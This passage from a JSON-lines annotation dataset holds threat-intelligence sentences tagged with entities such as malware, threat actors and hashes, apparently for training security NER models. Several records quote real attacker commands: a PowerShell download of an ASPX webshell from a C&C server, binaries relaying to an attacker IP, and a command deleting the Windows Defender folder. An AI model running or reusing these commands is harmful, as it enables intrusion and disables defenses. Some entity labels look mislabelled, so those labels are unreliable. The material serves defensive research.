devices.","entities":[{"id":50243,"label":"malware","start_offset":102,"end_offset":109},{"id":50244,"label":"SOFTWARE","start_offset":166,"end_offset":173},{"id":50245,"label":"identity","start_offset":17,"end_offset":29}],"relations":[{"id":934,"from_id":50243,"to_id":50244,"type":"targets"}],"Comments":[]} +{"id":2068,"text":"The content of the videos were tutorials and walkthroughs, where the threat actor showed his methodology of performing certain actions, depending on the video.","entities":[],"relations":[],"Comments":[]} +{"id":2307,"text":"macOS Exploits","entities":[{"id":45454,"label":"SOFTWARE","start_offset":0,"end_offset":5}],"relations":[],"Comments":[]} +{"id":6633,"text":"DarkHydrus is a more sophisticated group when compared to others operating in the region, as their toolset and TTPs show a higher skill level.","entities":[{"id":20581,"label":"threat-actor","start_offset":0,"end_offset":10},{"id":20582,"label":"location","start_offset":82,"end_offset":88},{"id":20583,"label":"location","start_offset":107,"end_offset":110}],"relations":[],"Comments":[]} +{"id":554,"text":"For example, the Xorist ransomware (SHA256: 4979A10B81C41ECC0FC3A0F376ADE766CE616D2301639F74E0277047CC40E3D6) demanded \u00a31,000 for a ransom; the bitcoin wallet address was 1BFqrLCDwwrxueY7FFDn8DqeoasPJignxt.","entities":[{"id":1837,"label":"SHA2","start_offset":44,"end_offset":108},{"id":46168,"label":"malware","start_offset":17,"end_offset":34},{"id":46169,"label":"SOFTWARE","start_offset":144,"end_offset":151}],"relations":[{"id":157,"from_id":1837,"to_id":46168,"type":"indicates"}],"Comments":[]} +{"id":10056,"text":" Figure 8. tsm32 Figure 9.","entities":[],"relations":[],"Comments":[]} +{"id":7916,"text":"This post is also available in: \u65e5\u672c\u8a9e (Japanese) As part of Palo Alto Networks Unit 42\u2019s ongoing monitoring of the Shamoon 2 situation, we have updated information since our last posting Threat Brief: Second Wave of Shamoon 2 Attacks Reveal Possible New Tactic.","entities":[{"id":24524,"label":"location","start_offset":5,"end_offset":9},{"id":24527,"label":"tools","start_offset":119,"end_offset":126},{"id":24530,"label":"malware","start_offset":220,"end_offset":227}],"relations":[],"Comments":[]} +{"id":7216,"text":"Injected Script in May 2018 e0e30eb5e5ff1e71548c4405d04ce16b94c4cb7f8c2ed9bd75933cea53533114 Injected Script in June 2018 67a1312768c4ca3379181c0fcc1143460efcb4bff7a4774c9c775043964c0878","entities":[{"id":22551,"label":"SHA2","start_offset":28,"end_offset":92},{"id":22553,"label":"SHA2","start_offset":122,"end_offset":186}],"relations":[],"Comments":[]} +{"id":825,"text":"Analysts can collect alerts on the Application Message \u201cCVE-2020-0601\u201d as a means to hunt for attempted exploitation of this vulnerability on patched systems.","entities":[{"id":46372,"label":"vulnerability","start_offset":56,"end_offset":69}],"relations":[],"Comments":[]} +{"id":3156,"text":"That\u2019s part of the reason why AWS built Amazon GuardDuty Malware Protection was built.","entities":[{"id":48273,"label":"SOFTWARE","start_offset":40,"end_offset":75},{"id":48272,"label":"identity","start_offset":30,"end_offset":33}],"relations":[],"Comments":[]} +{"id":5302,"text":"For every hard-coded TCP port used to communicate with the C&C servers, the malware creates a rule in Netfilter \u2014 the Linux kernel firewall \u2014 using the iptc_insert_entry() function from libiptc1 to allow output communication to it.","entities":[{"id":51359,"label":"SOFTWARE","start_offset":118,"end_offset":139},{"id":51357,"label":"tools","start_offset":102,"end_offset":111}],"relations":[],"Comments":[]} +{"id":2792,"text":"And if you think your system is being affected by one of these attacks, you can, in most cases, end the attack by either leaving the site or closing the browser.","entities":[],"relations":[],"Comments":[]} +{"id":745,"text":"These 4 exploits (CVE-2014-1815, CVE-2014-1776, CVE-2014-0322, CVE-2014-0324) were all based on use-after-free bugs.","entities":[{"id":46336,"label":"vulnerability","start_offset":18,"end_offset":31},{"id":46337,"label":"vulnerability","start_offset":33,"end_offset":46},{"id":46339,"label":"vulnerability","start_offset":63,"end_offset":76},{"id":46338,"label":"vulnerability","start_offset":48,"end_offset":61}],"relations":[],"Comments":[]} +{"id":1896,"text":"The download links were also replaced to download the malicious Android application instead.","entities":[{"id":45171,"label":"SOFTWARE","start_offset":64,"end_offset":71}],"relations":[],"Comments":[]} +{"id":2672,"text":"From the last two quarters of FY 2021 to the first two quarters of FY 2022, there has been an average 37-day difference. ","entities":[{"id":47873,"label":"TIME","start_offset":30,"end_offset":37},{"id":47874,"label":"TIME","start_offset":67,"end_offset":74}],"relations":[],"Comments":[]} +{"id":8767,"text":"We terminated 6 YouTube channels as part of our ongoing investigation into coordinated influence operations linked to Iran.","entities":[],"relations":[],"Comments":[]} +{"id":1979,"text":"Figure 4: An example of a properly modified DTLS packet cookie ","entities":[],"relations":[],"Comments":[]} +{"id":13396,"text":"If the link was not active, the user was redirected directly to a legitimate website.","entities":[],"relations":[],"Comments":[]} +{"id":6559,"text":"Figure 1: Twitter account of Hack520","entities":[],"relations":[],"Comments":[]} +{"id":7966,"text":" Palo Alto Networks has published a vulnerability scanner app in the Google Play store.","entities":[],"relations":[],"Comments":[]} +{"id":4804,"text":"Here is a deeper look at some campaign activity TAG has observed since our last update: Turla, a group publicly attributed to Russia\u2019s Federal Security Service (FSB), recently hosted Android apps on a domain spoofing the Ukrainian Azov Regiment.","entities":[{"id":50714,"label":"identity","start_offset":48,"end_offset":51},{"id":50715,"label":"threat-actor","start_offset":88,"end_offset":93},{"id":50719,"label":"SOFTWARE","start_offset":183,"end_offset":190},{"id":50716,"label":"location","start_offset":126,"end_offset":132},{"id":50717,"label":"identity","start_offset":135,"end_offset":165},{"id":50718,"label":"identity","start_offset":221,"end_offset":244}],"relations":[{"id":994,"from_id":50717,"to_id":50716,"type":"located-at"},{"id":995,"from_id":50715,"to_id":50717,"type":"attributed-to"},{"id":996,"from_id":50715,"to_id":50718,"type":"impersonates"},{"id":997,"from_id":50715,"to_id":50719,"type":"uses"}],"Comments":[]} +{"id":1117,"text":" The number of times any single mutex is used drops rapidly from the millions of samples down to thousands and from there, even further.","entities":[],"relations":[],"Comments":[]} +{"id":13845,"text":"Module Load","entities":[],"relations":[],"Comments":[]} +{"id":1175,"text":"Overwhelming.","entities":[],"relations":[],"Comments":[]} +{"id":12136,"text":"In our environment, we did not receive any payloads past this stage.","entities":[],"relations":[],"Comments":[]} +{"id":10571,"text":"For example, attackers impersonate a journalist to seed false stories with other reporters to spread disinformation.","entities":[],"relations":[],"Comments":[]} +{"id":11200,"text":"HYPERSCRAPE won't run unless in a directory with other file dependencies.","entities":[],"relations":[],"Comments":[]} +{"id":1803,"text":" The PowerShell process will download an ASPX webshell from the C&C server using the command < cmd.exe \/c powershell -command Invoke-WebRequest -Uri hxxp:\/\/xx.xx.xx.xx\/subshell.aspx -OutFile \/ManageEngine\/ADSelfService Plus\/webapps\/adssp\/help\/admin-guide >.","entities":[{"id":45139,"label":"SOFTWARE","start_offset":44,"end_offset":48},{"id":45140,"label":"Infrastucture","start_offset":67,"end_offset":77},{"id":45141,"label":"URL","start_offset":152,"end_offset":184},{"id":45138,"label":"tools","start_offset":8,"end_offset":18},{"id":45142,"label":"FILEPATH","start_offset":194,"end_offset":257},{"id":5318,"label":"tools","start_offset":109,"end_offset":119},{"id":5317,"label":"tools","start_offset":98,"end_offset":105}],"relations":[],"Comments":[]} +{"id":6447,"text":"Otherwise, the TTPs in use remain broadly similar.","entities":[],"relations":[],"Comments":[]} +{"id":11186,"text":"The attacker runs HYPERSCRAPE on their own machine to download victims\u2019 inboxes using previously acquired credentials.","entities":[],"relations":[],"Comments":[]} +{"id":8874,"text":"The attacker\u2019s usage of a tool can be divided into two separate events: the dropping of the tool by the svchost.exe process that runs the malicious code and the execution of the tool via the scheduled task.","entities":[{"id":27446,"label":"location","start_offset":26,"end_offset":30},{"id":27447,"label":"location","start_offset":31,"end_offset":34},{"id":27448,"label":"location","start_offset":92,"end_offset":96},{"id":27449,"label":"location","start_offset":153,"end_offset":156},{"id":27450,"label":"location","start_offset":178,"end_offset":182},{"id":27451,"label":"attack-pattern","start_offset":191,"end_offset":205}],"relations":[],"Comments":[]} +{"id":10662,"text":"Before that, there were no vulnerabilities rated at this level.","entities":[],"relations":[],"Comments":[]} +{"id":10913,"text":"We believe that the StrongPity Threat actor is actively developing backdoors for Android.","entities":[{"id":33211,"label":"threat-actor","start_offset":20,"end_offset":30}],"relations":[],"Comments":[]} +{"id":452,"text":"One of the most important \u201cinnovations\u201d in malware in the past decade is what\u2019s called a Domain Generation Algorithm (\u201cDGA\u201d)\u201d.","entities":[],"relations":[],"Comments":[]} +{"id":44,"text":"In 2007, the infection of a system in Australia went for US$0.60, while an infection in Poland was only a fraction of the cost, at US$0.096.","entities":[{"id":45814,"label":"location","start_offset":38,"end_offset":48},{"id":45815,"label":"location","start_offset":88,"end_offset":94},{"id":45813,"label":"TIME","start_offset":3,"end_offset":7}],"relations":[],"Comments":[]} +{"id":2615,"text":"They claim in some cases to have targeted organizations with the specific goal of gaining access to customers.","entities":[],"relations":[],"Comments":[]} +{"id":6426,"text":"This campaign uses the following legitimate remote admin tools such as: ScreenConnect RemoteUtilities We have named this intrusion set Earth Vetala.","entities":[{"id":20002,"label":"location","start_offset":5,"end_offset":13},{"id":20003,"label":"location","start_offset":44,"end_offset":50},{"id":20004,"label":"malware","start_offset":73,"end_offset":86},{"id":20005,"label":"malware","start_offset":87,"end_offset":102}],"relations":[],"Comments":[]} +{"id":304,"text":"Last Tuesday, Trusteer reported that a new variant of Citadel, which has long relied on VNC to give attackers remote control over systems, began adding new credentials to systems it infects and enabling the standard Windows remote desktop application (RDP).","entities":[{"id":1035,"label":"malware","start_offset":54,"end_offset":61},{"id":46000,"label":"tools","start_offset":88,"end_offset":91},{"id":46001,"label":"tools","start_offset":216,"end_offset":256},{"id":46002,"label":"identity","start_offset":14,"end_offset":22},{"id":46003,"label":"TIME","start_offset":0,"end_offset":12}],"relations":[{"id":142,"from_id":1035,"to_id":46000,"type":"uses"},{"id":143,"from_id":1035,"to_id":46001,"type":"uses"}],"Comments":[]} +{"id":4042,"text":"It is a simple but effective technique that makes security analysis more difficult and also ensures that only their operators can use the tools.","entities":[],"relations":[],"Comments":[]} +{"id":3464,"text":"To paint a bigger picture of Blackgear\u2019s attacks, we correlated the tools and tactics they used against their targets.","entities":[{"id":49259,"label":"threat-actor","start_offset":29,"end_offset":38}],"relations":[],"Comments":[]} +{"id":12659,"text":"The code also shares similarities with the open-source EDA2 ransomware kit.","entities":[{"id":39272,"label":"attack-pattern","start_offset":48,"end_offset":54}],"relations":[],"Comments":[]} +{"id":110,"text":"When developing your cloud security architecture and strategy, it is important to always keep the ends in mind.","entities":[],"relations":[],"Comments":[]} +{"id":10912,"text":"StrongPity actively develops new malicious android apps","entities":[],"relations":[],"Comments":[]} +{"id":1729,"text":"A method attackers use to target you using email that you might not know about.","entities":[],"relations":[],"Comments":[]} +{"id":13156,"text":"A sample scenario of the USBferry attack Tropic Trooper is well aware that military or government organizations may have more robust security in their physically isolated environments (i.e., the use of biometrics or USB use in a quarantined machine before an air-gapped environment).","entities":[{"id":48940,"label":"threat-actor","start_offset":41,"end_offset":55},{"id":48939,"label":"malware","start_offset":25,"end_offset":34}],"relations":[{"id":504,"from_id":48939,"to_id":48940,"type":"related-to"}],"Comments":[]} +{"id":2167,"text":"They provided a workaround to disable the MSDT URL protocol, however, this may break other diagnostic tools that rely on the MSDT URL protocol to operate.","entities":[],"relations":[],"Comments":[]} +{"id":4376,"text":"In December 2021, TAG discovered a novel Charming Kitten tool, named HYPERSCRAPE, used to steal user data from Gmail, Yahoo!, and Microsoft Outlook accounts.","entities":[{"id":13122,"label":"threat-actor","start_offset":41,"end_offset":56},{"id":50182,"label":"TIME","start_offset":3,"end_offset":16},{"id":50183,"label":"identity","start_offset":18,"end_offset":21},{"id":50188,"label":"attack-pattern","start_offset":90,"end_offset":105},{"id":50186,"label":"SOFTWARE","start_offset":118,"end_offset":124},{"id":50184,"label":"malware","start_offset":69,"end_offset":80},{"id":50185,"label":"SOFTWARE","start_offset":111,"end_offset":116},{"id":50187,"label":"SOFTWARE","start_offset":130,"end_offset":147}],"relations":[{"id":926,"from_id":50184,"to_id":13122,"type":"authored-by"},{"id":927,"from_id":50184,"to_id":50188,"type":"uses"},{"id":928,"from_id":50184,"to_id":50185,"type":"targets"},{"id":929,"from_id":50184,"to_id":50186,"type":"targets"},{"id":930,"from_id":50184,"to_id":50187,"type":"targets"}],"Comments":[]} +{"id":13495,"text":"Others, however, prefer to act as \u201ccybermercenaries,\u201d selling their services to anyone willing to pay.","entities":[],"relations":[],"Comments":[]} +{"id":7463,"text":"We discovered a new campaign targeting organizations in Turkey, Pakistan and Tajikistan that has some similarities with an earlier campaign named MuddyWater, which hit various industries in several countries, primarily in the Middle East and Central Asia.","entities":[{"id":23207,"label":"location","start_offset":20,"end_offset":28},{"id":23210,"label":"location","start_offset":73,"end_offset":76},{"id":23212,"label":"location","start_offset":131,"end_offset":139},{"id":23214,"label":"identity","start_offset":164,"end_offset":167},{"id":23216,"label":"location","start_offset":238,"end_offset":241}],"relations":[],"Comments":[]} +{"id":13714,"text":"Waterbear, which has been around for several years, is a campaign that uses modular malware capable of including additional functions remotely.","entities":[{"id":51762,"label":"campaign","start_offset":0,"end_offset":9}],"relations":[],"Comments":[]} +{"id":3100,"text":" Full technical details on the vulnerabilities are available at the sites referenced above.","entities":[],"relations":[],"Comments":[]} +{"id":13262,"text":"PDB strings inside the loader file","entities":[],"relations":[],"Comments":[]} +{"id":4065,"text":"No Action 0x10005","entities":[],"relations":[],"Comments":[]} +{"id":4657,"text":"If the cookie file path was not supplied via the command line, a new form will allow the operator to do so using drag and drop.","entities":[],"relations":[],"Comments":[]} +{"id":631,"text":" Petya is a ransomware family that works by modifying the Window\u2019s system\u2019s Master Boot Record (MBR), causing the system to crash.","entities":[{"id":2103,"label":"malware","start_offset":1,"end_offset":6},{"id":46218,"label":"SOFTWARE","start_offset":58,"end_offset":100}],"relations":[],"Comments":[]} +{"id":7795,"text":"The VBA macro in the document downloads an NSIS-packed executable from hxxps:\/\/senddocs[.]icu\/stelar.exe, which installs ServHelper.","entities":[{"id":24144,"label":"malware","start_offset":43,"end_offset":47},{"id":24145,"label":"tools","start_offset":121,"end_offset":131}],"relations":[],"Comments":[]} +{"id":7740,"text":"Figure 14.","entities":[],"relations":[],"Comments":[]} +{"id":8346,"text":"x.TextContent.StartsWith(\"Review blocked sign-in attempt\") || x.TextContent.","entities":[],"relations":[],"Comments":[]} +{"id":4145,"text":"After successfully exploiting the vulnerable system, threat actors also drop following tools: FRP and Chisel.","entities":[{"id":49957,"label":"tools","start_offset":102,"end_offset":108},{"id":49956,"label":"tools","start_offset":94,"end_offset":97}],"relations":[],"Comments":[]} +{"id":11933,"text":"We terminated 15 YouTube channels as part of our investigation into coordinated influence operations linked to Ethiopia.","entities":[],"relations":[],"Comments":[]} +{"id":5543,"text":"The record is 57 different payment gateways, which makes the hackers\u2019 job much easier as they can launch attack campaigns across the globe with the same tools All this is bad news for online shoppers.","entities":[],"relations":[],"Comments":[]} +{"id":3328,"text":"The scripts intercept HTTP GET requests that are sent to port 80.","entities":[],"relations":[],"Comments":[]} +{"id":4317,"text":"Spear-phishing email from early August.","entities":[{"id":50118,"label":"TIME","start_offset":32,"end_offset":38},{"id":50117,"label":"attack-pattern","start_offset":0,"end_offset":14}],"relations":[],"Comments":[]} +{"id":1858,"text":" Deploying across the network We saw software deployment tool PDQ being used to deploy malicious batch scripts to multiple endpoints in the network.","entities":[{"id":46986,"label":"attack-pattern","start_offset":83,"end_offset":113},{"id":46985,"label":"tools","start_offset":65,"end_offset":68}],"relations":[{"id":283,"from_id":46986,"to_id":46985,"type":"uses"}],"Comments":[]} +{"id":13608,"text":" Figure 12.","entities":[],"relations":[],"Comments":[]} +{"id":2108,"text":" Palo Alto Network customers running Cortex XDR version 7.3 with the latest content update are protected from \u201cPass-the-Ticket\u201d attacks using the standard Windows API.","entities":[{"id":47244,"label":"identity","start_offset":1,"end_offset":18},{"id":47245,"label":"SOFTWARE","start_offset":37,"end_offset":59},{"id":47246,"label":"attack-pattern","start_offset":110,"end_offset":135},{"id":47247,"label":"SOFTWARE","start_offset":155,"end_offset":166}],"relations":[],"Comments":[]} +{"id":3087,"text":"On January 3, 2018, researchers, including those with Google Project Zero, released information on three new vulnerabilities:","entities":[{"id":48150,"label":"TIME","start_offset":3,"end_offset":18},{"id":45766,"label":"identity","start_offset":54,"end_offset":73}],"relations":[],"Comments":[]} +{"id":2829,"text":"If it was successful in connecting to the domain, the ransomware would not execute.","entities":[],"relations":[],"Comments":[]} +{"id":13520,"text":"Learn more about the activities and targets of Void Balaur in our research paper, Void Balaur: Tracking a Cybermercenary\u2019s Activities.","entities":[{"id":42161,"label":"threat-actor","start_offset":47,"end_offset":58}],"relations":[],"Comments":[]} +{"id":4554,"text":"We believe there was no major impact on Android users and that the number of installs was miniscule.","entities":[{"id":50364,"label":"SOFTWARE","start_offset":40,"end_offset":47}],"relations":[],"Comments":[]} +{"id":13468,"text":"Last month, we sent 1,755 warnings to users whose accounts were targets of government-backed attackers.","entities":[],"relations":[],"Comments":[]} +{"id":12075,"text":"The attackers use this function to relay device-based data to the channel, so they can see details such as the IP, useragent, and locales of visitors to their phishing sites in real-time.","entities":[{"id":37375,"label":"location","start_offset":83,"end_offset":86},{"id":37376,"label":"location","start_offset":126,"end_offset":129},{"id":37377,"label":"attack-pattern","start_offset":159,"end_offset":167},{"id":37378,"label":"location","start_offset":168,"end_offset":173},{"id":37379,"label":"location","start_offset":177,"end_offset":181},{"id":37380,"label":"location","start_offset":182,"end_offset":186}],"relations":[],"Comments":[]} +{"id":13921,"text":"Based on Trend Micro data, the US is by far DarkSide\u2019s most targeted country, at more than 500 detections, followed by France, Belgium, and Canada.","entities":[{"id":48745,"label":"malware","start_offset":44,"end_offset":55},{"id":48748,"label":"location","start_offset":127,"end_offset":134},{"id":48747,"label":"location","start_offset":119,"end_offset":125},{"id":48746,"label":"location","start_offset":31,"end_offset":34},{"id":48749,"label":"location","start_offset":140,"end_offset":146}],"relations":[{"id":452,"from_id":48745,"to_id":48746,"type":"targets"},{"id":455,"from_id":48745,"to_id":48749,"type":"targets"},{"id":453,"from_id":48745,"to_id":48747,"type":"targets"},{"id":454,"from_id":48745,"to_id":48748,"type":"targets"}],"Comments":[]} +{"id":4012,"text":"Read our three-part series on smart factories from the perspective of supply chain disruptions to learn more about supply chain cybersecurity.","entities":[],"relations":[],"Comments":[]} +{"id":5244,"text":"How is AnubisSpy related to Sphinx?","entities":[{"id":51278,"label":"campaign","start_offset":28,"end_offset":34},{"id":16114,"label":"malware","start_offset":7,"end_offset":16}],"relations":[],"Comments":[]} +{"id":3211,"text":"Examining the BIOPASS RAT modules We observed a few scheduled tasks being created, with the number dependent on the analyzed sample.","entities":[{"id":9807,"label":"malware","start_offset":14,"end_offset":25}],"relations":[],"Comments":[]} +{"id":8100,"text":"We found that the group employs Apps Conversion Tracking to configure the C&C server address.","entities":[],"relations":[],"Comments":[]} +{"id":1394,"text":" If you think you may have been compromised or have an urgent matter, get in touch with the Unit 42 Incident Response team or call North America Toll-Free: 866.486.4842 (866.4.UNIT42), EMEA: +31.20.299.3130, APAC: +65.6983.8730, or Japan: +81.50.1790.0200.","entities":[{"id":46738,"label":"identity","start_offset":92,"end_offset":99},{"id":46739,"label":"location","start_offset":131,"end_offset":144},{"id":46740,"label":"location","start_offset":185,"end_offset":189},{"id":46741,"label":"location","start_offset":208,"end_offset":212},{"id":46742,"label":"location","start_offset":232,"end_offset":237}],"relations":[],"Comments":[]} +{"id":4306,"text":"This appendix contains the latest indicators of compromise (IOCs) related to the different groups.","entities":[],"relations":[],"Comments":[]} +{"id":679,"text":"An example for such attack vector being leveraged by attackers is CVE-2018-4878, an Adobe Flash Player Zero-Day exploited by embedding malicious SWF files in Excel documents.","entities":[{"id":46251,"label":"vulnerability","start_offset":66,"end_offset":79},{"id":46252,"label":"SOFTWARE","start_offset":84,"end_offset":102},{"id":46253,"label":"attack-pattern","start_offset":125,"end_offset":173}],"relations":[{"id":176,"from_id":46252,"to_id":46251,"type":"has"},{"id":177,"from_id":46251,"to_id":46253,"type":"uses"}],"Comments":[]} +{"id":12165,"text":"The victim would need to have a session open on these websites from Safari for cookies to be successfully exfiltrated.","entities":[],"relations":[],"Comments":[]} +{"id":14383,"text":"Ian Loe of NTUC gives a killer example of uncovering stealthy attacks using EDR and MDR here.","entities":[],"relations":[],"Comments":[]} +{"id":3676,"text":"Successfully entering the system leads to the next step: executing the attack.","entities":[],"relations":[],"Comments":[]} +{"id":2613,"text":" Although the commodity malware RedLine Stealer has been implicated for credential harvesting in some attacks, it\u2019s unclear if this is first- or third-party, and it cannot be used as a definitive indicator of Lapsus$-specific activity.","entities":[{"id":45617,"label":"malware","start_offset":32,"end_offset":47},{"id":45618,"label":"attack-pattern","start_offset":72,"end_offset":93},{"id":45619,"label":"threat-actor","start_offset":209,"end_offset":216}],"relations":[{"id":109,"from_id":45618,"to_id":45617,"type":"delivers"}],"Comments":[]} +{"id":2802,"text":"Patches for this vulnerability for all supported versions of Windows have been available since March 2017.","entities":[{"id":45699,"label":"TIME","start_offset":95,"end_offset":105},{"id":45700,"label":"SOFTWARE","start_offset":61,"end_offset":68}],"relations":[],"Comments":[]} +{"id":3829,"text":"Command added when the Koadic RAT is downloaded (use of {Variable}.shell.exec command)","entities":[{"id":11613,"label":"malware","start_offset":23,"end_offset":29}],"relations":[],"Comments":[]} +{"id":966,"text":"Figure 3.","entities":[],"relations":[],"Comments":[]} +{"id":6950,"text":"This malware is also commonly distributed in spear-phishing campaigns using social engineering tactics to lure victims into downloading another malicious document.","entities":[{"id":21756,"label":"location","start_offset":45,"end_offset":50},{"id":21757,"label":"attack-pattern","start_offset":51,"end_offset":59},{"id":21758,"label":"location","start_offset":106,"end_offset":110}],"relations":[],"Comments":[]} +{"id":4246,"text":"Although no forms are displayed while the malware is running, we can see its TForm object in the Delphi decompiler.","entities":[],"relations":[],"Comments":[]} +{"id":5159,"text":"We also know that it takes almost three\u2026it takes two and a half to three months actually contain a breach once you discover it and the reason for all of this is lateral movement.","entities":[],"relations":[],"Comments":[]} +{"id":3815,"text":"Note that if ANEL 5.1.2 rc1 was downloaded, the attacker would use HTTPS to avoid the downloaded data being captured as clear text.","entities":[{"id":11587,"label":"malware","start_offset":13,"end_offset":17}],"relations":[],"Comments":[]} +{"id":13511,"text":"Organizational leaders and employees that are heavily involved with the company\u2019s core business are among the threat actor\u2019s favored targets, since these individuals will likely have access to the kind of information the group seeks.","entities":[],"relations":[],"Comments":[]} +{"id":3704,"text":"Carbanak also performs brute force tactics or takes advantage of credentials that are saved in web browsers.","entities":[{"id":11236,"label":"attack-pattern","start_offset":23,"end_offset":34}],"relations":[],"Comments":[]} +{"id":3472,"text":"Marade will then decrypt the encrypted strings and retrieve the C&C server information.","entities":[{"id":49271,"label":"malware","start_offset":0,"end_offset":6}],"relations":[],"Comments":[]} +{"id":6685,"text":"If an MSP\u2019s VSA system was compromised, that could allow an attacker to deploy malware into multiple networks managed by that MSP.","entities":[],"relations":[],"Comments":[]} +{"id":12587,"text":"It also has several components, some of which appear to be configured as modules.","entities":[],"relations":[],"Comments":[]} +{"id":7941,"text":"Let\u2019s take a closer look at what happens.","entities":[],"relations":[],"Comments":[]} +{"id":7286,"text":"Here is the code signing information for the app bundle sample.","entities":[{"id":22729,"label":"attack-pattern","start_offset":12,"end_offset":24},{"id":22730,"label":"location","start_offset":56,"end_offset":62}],"relations":[],"Comments":[]} +{"id":14099,"text":"However, one feature that is present in the previous malware attributed to APT37 and Operation Earth Kitsune is the screenshot capture.","entities":[{"id":48178,"label":"threat-actor","start_offset":75,"end_offset":81},{"id":48179,"label":"campaign","start_offset":85,"end_offset":108},{"id":43632,"label":"location","start_offset":81,"end_offset":84}],"relations":[],"Comments":[]} +{"id":6484,"text":" This was done using two separate commands: C:\\programdate\\1.exe -relayserver 87.236.212[.]184:5555 C:\\users\\public\\new.exe -relayserver 87.236.212[.]184:5555","entities":[],"relations":[],"Comments":[]} +{"id":10413,"text":"For now, we can surmise that it has the makings of a potential targeted attack because of its cyber espionage capabilities, as well as the potential for delivering ransomware and coinminer.","entities":[{"id":31663,"label":"location","start_offset":12,"end_offset":15},{"id":31664,"label":"location","start_offset":175,"end_offset":178},{"id":31665,"label":"malware","start_offset":179,"end_offset":188}],"relations":[],"Comments":[]} +{"id":3706,"text":"Discovery","entities":[],"relations":[],"Comments":[]} +{"id":10943,"text":"In order to do so, these users would be required to enable installation of the applications from \u201cunknown sources\u201d on their devices.","entities":[],"relations":[],"Comments":[]} +{"id":4111,"text":"The data decryption procedure is as follows: First, the encrypted data is decrypted with a one-byte XOR key (0xFF).","entities":[],"relations":[],"Comments":[]} +{"id":1925,"text":"Digging into Urpage, we found another link\u2014two malicious RTF files that exploit different vulnerabilities but download a similar script (detected as TROJ_POWLOAD.GAA) containing two base64-encoded URLs.","entities":[{"id":47050,"label":"threat-actor","start_offset":13,"end_offset":19}],"relations":[],"Comments":[]} +{"id":2701,"text":" Some key takeaways from the claims made in the interview were: LockBit 3.0: Another Upgrade to the World\u2019s Most Active Ransomware Ransomware Groups to Watch: Emerging Threats Average Ransom Payment Up 71% This Year, Approaches $1 Million 2022 Unit 42 Ransomware Threat Report Highlights Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[{"id":47939,"label":"threat-actor","start_offset":64,"end_offset":75},{"id":47940,"label":"identity","start_offset":244,"end_offset":251}],"relations":[],"Comments":[]} +{"id":2874,"text":"The exploit utilized several advanced exploit techniques to make it almost 100% reliable.","entities":[],"relations":[],"Comments":[]} +{"id":1386,"text":"All files and directories, including those on mounted USB drives, excluding the floppy drive (A:) are targeted.","entities":[{"id":46734,"label":"FILEPATH","start_offset":94,"end_offset":96}],"relations":[],"Comments":[]} +{"id":5164,"text":"How are you trying to reduce it?","entities":[],"relations":[],"Comments":[]} +{"id":9304,"text":"Credit card number _cc_expmonth bb Credit card expiration month _cc_expyear cc Credit card expiration year cc_type dd","entities":[],"relations":[],"Comments":[]} +{"id":2466,"text":" A majority of the activity used the tomcarwar.jsp filename that was used in the initial PoC script, which accounted for over 57% of the filenames observed.","entities":[],"relations":[],"Comments":[]} +{"id":13942,"text":"Encrypt the files, drop the ransom note, and wait for the payment.","entities":[],"relations":[],"Comments":[]} +{"id":2683,"text":" StealBit contains the following capabilities:","entities":[{"id":47891,"label":"malware","start_offset":1,"end_offset":9}],"relations":[],"Comments":[]} +{"id":4437,"text":"TAG is committed to sharing research to raise awareness on bad actors like Charming Kitten within the security community, and for companies and individuals that may be targeted.","entities":[{"id":50211,"label":"identity","start_offset":0,"end_offset":3},{"id":50212,"label":"threat-actor","start_offset":75,"end_offset":90}],"relations":[],"Comments":[]} +{"id":3049,"text":"Our Wildfire analysis cloud captured the initial app and identified it as Scareware.","entities":[{"id":48126,"label":"SOFTWARE","start_offset":4,"end_offset":12}],"relations":[],"Comments":[]} +{"id":3171,"text":"BIOPASS RAT possesses basic features found in other malware, such as file system assessment, remote desktop access, file exfiltration, and shell command execution.","entities":[{"id":48295,"label":"malware","start_offset":0,"end_offset":11}],"relations":[],"Comments":[]} +{"id":8879,"text":"Launching the auxiliary tool via the scheduled task Scheduled tasks are usually associated with persistence or privilege escalation, which is not the case in this incident.","entities":[{"id":27462,"label":"location","start_offset":24,"end_offset":28},{"id":27463,"label":"attack-pattern","start_offset":37,"end_offset":51},{"id":27464,"label":"location","start_offset":72,"end_offset":75},{"id":27465,"label":"attack-pattern","start_offset":115,"end_offset":135},{"id":27466,"label":"location","start_offset":154,"end_offset":158}],"relations":[],"Comments":[]} +{"id":10566,"text":" We have a long-standing policy to send you a warning if we detect that your account is a target of government-backed phishing or malware attempts.","entities":[{"id":32231,"label":"location","start_offset":11,"end_offset":15},{"id":32232,"label":"location","start_offset":90,"end_offset":96},{"id":32233,"label":"attack-pattern","start_offset":118,"end_offset":126}],"relations":[],"Comments":[]} +{"id":3411,"text":"BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A bd8dc7e3909f6663c0fff653d7afbca2b89f2e9bc6f27adaab27f640ccf52975 Silverlight.exe ","entities":[{"id":10291,"label":"malware","start_offset":0,"end_offset":11},{"id":10292,"label":"SHA2","start_offset":46,"end_offset":110},{"id":49092,"label":"malware","start_offset":20,"end_offset":44},{"id":49093,"label":"FILEPATH","start_offset":112,"end_offset":127}],"relations":[{"id":685,"from_id":10291,"to_id":49092,"type":"duplicate-of"},{"id":686,"from_id":49093,"to_id":10292,"type":"duplicate-of"},{"id":687,"from_id":49093,"to_id":49092,"type":"indicates"},{"id":688,"from_id":10292,"to_id":49092,"type":"indicates"}],"Comments":[]} +{"id":3905,"text":"Web shells, in their simplicity and straightforwardness, are highly potent when it comes to compromising systems and environments.","entities":[],"relations":[],"Comments":[]} +{"id":3407,"text":"flash_ins.exe ","entities":[{"id":49073,"label":"FILEPATH","start_offset":0,"end_offset":13}],"relations":[],"Comments":[]} +{"id":13166,"text":"The activities vary in target environments; some execute commands, source target files or folder lists, and copy files from physically isolated hosts to compromised hosts, among other things.","entities":[{"id":41088,"label":"location","start_offset":23,"end_offset":29},{"id":41089,"label":"attack-pattern","start_offset":67,"end_offset":73},{"id":41090,"label":"location","start_offset":74,"end_offset":80},{"id":41091,"label":"location","start_offset":104,"end_offset":107}],"relations":[],"Comments":[]} +{"id":1383,"text":"The following command parameters are passed to AdvancedRun: \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \/WindowState 0 \/CommandLine \"rmdir 'C:\\ProgramData\\Microsoft\\Windows Defender' -Recurse\" \/StartDirectory \"\" \/RunAs 8 \/Run \"C:\\Users\\USERNAME]AppData\\Local\\Temp\\AdvancedRun.exe\" \/EXEFilename 